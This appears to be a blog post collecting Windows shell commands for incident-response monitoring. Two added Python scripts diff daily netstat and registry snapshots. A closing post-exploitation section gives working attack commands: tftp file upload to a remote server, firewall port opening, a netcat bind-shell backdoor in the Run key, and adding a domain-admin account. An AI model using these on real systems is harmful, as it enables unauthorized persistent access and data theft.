Windows Shell Tricks for post-exploitation and incident response
- The incident-response section is useful if you have a script running every day and compare the resulting logs. I think most of these commands come from an incident-response script I once got; I didn't figure them out on my own. So no big deal: here they are, inspired by Ed Skoudis' Command Line Kung Fu, several of my own findings and the Pauldotcom section:
Get system time and date
echo %date% %time%
enumerate local accounts, local groups, currently logged on users, and members of the administrators group
net users
Currently Logged on Users
psloggedon /accepteula
Local Groups
net localgroup
Members of the local administrators group
net localgroup administrators
net localgroup administrators /domain
Grab network info, arp tables, open connections, and firewall status
Current IP Configuration
ipconfig /all
Contents of the DNS Cache
ipconfig /displaydns
ARP Table Contents
arp -a
List domains in the workgroup
net view /domain
Enumerate all domain users (unprivileged)
netsh -r {ipaddress-of-remote-target} dump > ulist.txt
List shares
net share
net view \\servername
Wireless enumeration in Windows Vista
netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show profiles
netsh wlan show networks mode=bssid
Status of active TCP and UDP connections
netstat -ano
netstat -anbv
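Added example, not from the original post: it applies the post's "run it daily and diff the output" idea to netstat, comparing today's `netstat -ano` capture against a baseline and reporting listening sockets that were not there before. The two captures are constructed samples in the shape of `netstat -ano` output.

```python
"""Compare two `netstat -ano` captures and report new listening sockets.
Added example, not from the original post: it applies the post's
"run daily and diff" idea to netstat output. Sample captures are constructed."""

def parse_netstat(text):
    """Return a set of (proto, local_addr, state, pid) from `netstat -ano` text."""
    rows = set()
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # skip the header and blank lines
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, _foreign, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, _foreign, pid = parts
            state = "UDP"  # netstat prints no State column for UDP sockets
        else:
            continue  # malformed line; ignore rather than crash the daily job
        rows.add((proto, local, state, pid))
    return rows

def listening(rows):
    """Only sockets that accept traffic: TCP LISTENING and every bound UDP socket."""
    return {r for r in rows if r[2] in ("LISTENING", "UDP")}

def socket_key(row):
    """Compare on (proto, port, state); PIDs change across reboots, so ignore them."""
    proto, local, state, _pid = row
    return (proto, local.rsplit(":", 1)[1], state)

def new_listeners(baseline_text, today_text):
    """Listening sockets present today that the baseline capture did not have."""
    known = {socket_key(r) for r in listening(parse_netstat(baseline_text))}
    return sorted(r for r in listening(parse_netstat(today_text))
                  if socket_key(r) not in known)

# Constructed sample captures (shape of `netstat -ano`, values invented).
BASELINE = """Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    192.168.1.10:49700     192.168.1.20:445       ESTABLISHED     4
  UDP    0.0.0.0:5353           *:*                                    1234
"""
TODAY = BASELINE + "  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       3344\n"

if __name__ == "__main__":
    for proto, local, state, pid in new_listeners(BASELINE, TODAY):
        print(f"new listener: {proto} {local} {state} pid={pid}")
```

Feed it yesterday's and today's saved `netstat -ano` output and anything it returns is a port that started listening since the baseline; look the PID up in `tasklist /svc` to see which process owns it.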
Routing Table
route print
Hosts file contents
type %systemroot%\system32\drivers\etc\hosts
Works with almost every file, depending on your access level of course.
Windows Firewall Configuration
netsh firewall show state
Windows Firewall service state
netsh firewall show service
netsh firewall show allowedprogram
netsh firewall show portopening
netsh firewall show conf
netsh diag show all /v
Mapped Network Drives
net use
Grab a list of installed software and running processes
The small tools used here (psinfo, pslist, psloggedon) are Sysinternals PsTools. You can use netcat to transfer them, or simply net start %something% if you work remotely.
Machine Information
psinfo /accepteula /h /s
Running Processes
pslist -t /accepteula
Enumerate services running out of each process
Services running from each process
tasklist /svc
Grab state of all services on the machine
sc query state= all
Grab a list of the printers on the machine and properties
cscript %WINDIR%\System32\Prnmngr.vbs -l
note: this is really awesome... I think. You can abuse a printer's IP for IDS evasion tactics by spoofing it. Some printers tend to have firmware vulnerabilities; some multifunction devices tend to have documents stored on them. There's even a rumor of people wardialing these multifunction devices if they've got LAN access and telephone access. But I guess that's a joke.
Grab group policies applied to the machine
Effective group policies
gpresult
Grab drivers in use on the machine
For some of my own research to pwn stuff (device drivers are in a very sloppy development cycle... more later) this is kind of cool
Drivers currently in use
driverquery
Grab system variables
set
Dump the IE and Firefox history for all users on the machine
cscript IE_FireFox.vbs
note: this of course harms the privacy of people and is almost never in scope.
Deeper incident-response
Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %somepath%\HKLMrun.reg
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %somepath%\HKLMrunonce.reg
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %somepath%\HKCUrun.reg
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %somepath%\HKCUrunonce.reg
You can set %somepath% yourself, or use %computername% or any other defined variable. I just use it to monitor some systems. Nothing beats this: let these scripts run every day and diff the output. You see (almost) everything! That's, by the way, what I call security: monitoring, behavior detection... knowing what's normal and what's not.
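Added example, not from the original post: a parser and diff for the .reg files the `reg export` commands above write, so the daily job can report exactly which Run/RunOnce values appeared, disappeared or changed instead of leaving you to eyeball two exports. It assumes the files are unmodified `reg export` output (UTF-16LE with a "Windows Registry Editor Version 5.00" header); the two snapshots in the code are constructed.

```python
"""Diff two daily `reg export` snapshots of a Run/RunOnce key.
Added example, not from the original post. Assumes the .reg files come from
the `reg export` commands above (UTF-16LE text with a "Windows Registry Editor
Version 5.00" header). The two snapshots below are constructed."""
import re

# "name"="data" or @="data" (default value); data is kept verbatim (still escaped).
VALUE_RE = re.compile(r'^(?:"(?P<name>[^"]*)"|(?P<default>@))=(?P<data>.*)$')

def parse_reg_export(text):
    """Return {key_path: {value_name: data}} from reg export text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_RE.match(line)):
            name = "@" if m.group("default") else m.group("name")
            keys[current][name] = m.group("data")
    return keys

def load_reg_export(path):
    """reg export writes UTF-16LE with a BOM; Python's utf-16 codec strips it."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()

def diff_snapshots(old_text, new_text):
    """Return (added, removed, changed); each entry carries key, value name and data."""
    old, new = parse_reg_export(old_text), parse_reg_export(new_text)
    added, removed, changed = [], [], []
    for key in sorted(set(old) | set(new)):
        o, n = old.get(key, {}), new.get(key, {})
        for name in sorted(set(o) | set(n)):
            if name not in o:
                added.append((key, name, n[name]))
            elif name not in n:
                removed.append((key, name, o[name]))
            elif o[name] != n[name]:
                changed.append((key, name, o[name], n[name]))
    return added, removed, changed

# Constructed snapshots: yesterday's and today's export of HKLM\...\Run.
YESTERDAY = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"
'''
TODAY = YESTERDAY + r'"listener"="C:\\Windows\\System32\\nc.exe -p 6666 -L -d -e cmd.exe"' + "\n"
```

Call `diff_snapshots(load_reg_export(yesterday), load_reg_export(today))` from the daily job; every entry in the added list is a new autorun and the first thing to look at, and the removed and changed lists catch tampering with existing entries.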
Grab System Error Log for Review (Error ONLY)
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System
note: if you want to store this, just add >> dailyenumeration.txt after this.
Grab Application Error Logs for Review
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application
Calculate MD5 hashes of the system directory
This is just AWESOME for me: %somepath% again is just a placeholder for this post. I have a complex log rotation system with compression. If there's something I overlook, I can find it later for documentation purposes.
echo %date% %time% >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot% >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot%\system >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot%\system32 >> %somepath%\osmd5-%computername%.txt
echo %date% %time% >> %somepath%\osmd5-%computername%.txt
Again I have to say: I did not create this. I just collected stuff here and there. I'll add more... By the way: please use the zoom function in your browser. ;) Easier on the eyes.
Deeper post-exploitation
This is not incident-response any more. This is maintaining access and causing damage. Make sure your scope covers this, otherwise you're out.
Transfer files
You have to use a tftp server somewhere (and a way to circumvent the firewall):
tftp -i ip-address-of-tftp-server get toolname.exe
Upload files from target to remote server
tftp -i ip-address-of-tftp-server put filename-to-upload.txt
Allow program to listen through the firewall:
netsh firewall add allowedprogram C:\nltest.exe nltest enable
Open a port at the firewall
netsh firewall add portopening tcp 6666 lt enable all
Using edit
I actually prefer this and paste:
edit file.txt
Portscans with nbtstat
nbtstat -A 192.168.1.1
netstat -an | find /i "established"
Looking for some precious files
type *.* | find /i "internal"
dir /s *.xls
dir /s password*
Show hidden files, too
dir /s /a:h
Log the filestructure
tree >filestructure.txt
Adding a backdoor
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v listener /d "C:\Windows\System32\nc.exe -p 6666 -L -d -e cmd.exe"
And verify by querying again. Of course nc has to be transferred before... and the -L is for the Windows version of nc. Cygwin's just runs in the Cygwin environment.
Then reboot and have fun!
note: I would never use nc. I'd cover this traffic into http. But let's stay constructive for now.
Add a user
net user boesewicht letmein /add
net localgroup Administrators boesewicht /add
net group "domain admins" boesewicht /add
The first command creates the user and sets its password, the second grants local admin privileges, the third grants domain admin privileges. Afterwards you are in.
Leave proof
I had some of the "proof it" issues. Well here is a way to convince people:
net use
net view \\win2k-docs
net use * \\win2k-docs
net use
cd to the path and leave a file or two on the admin's Desktop. You can also (ab)use the NTFS feature of alternate data streams to hide files inside other files: use a ":" between the two file names to steganographically store one inside the other.
Have fun,
wishi